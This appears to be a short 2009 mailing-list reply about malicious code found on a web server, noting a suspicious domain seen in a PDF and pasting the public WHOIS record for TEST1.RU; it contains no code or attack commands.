Malicious code just found on web server

Mon Apr 20 14:42:52 UTC 2009

Paul,
I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.

Jake

WHOIS information on the domain

Whois Record

domain:     TEST1.RU
type:       CORPORATE
nserver:    ns1.centerhost.ru.
nserver:    ns1.cetis.ru.
state:      REGISTERED, DELEGATED
org:        Center of Effective Technologies and Systems CETIS
phone:      +7 4957711654
fax-no:     +7 4957879251
e-mail:     <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
e-mail:     <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
registrar:  REGRU-REG-RIPN
created:    2001.03.30
paid-till:  2010.04.03
source:     TC-RIPN

Registry Data  Created: 2001-03-30  Expires: 2010-04-03  Whois Server:
whois.ripn.net
 Server Data Domain Status:  Registered And No Website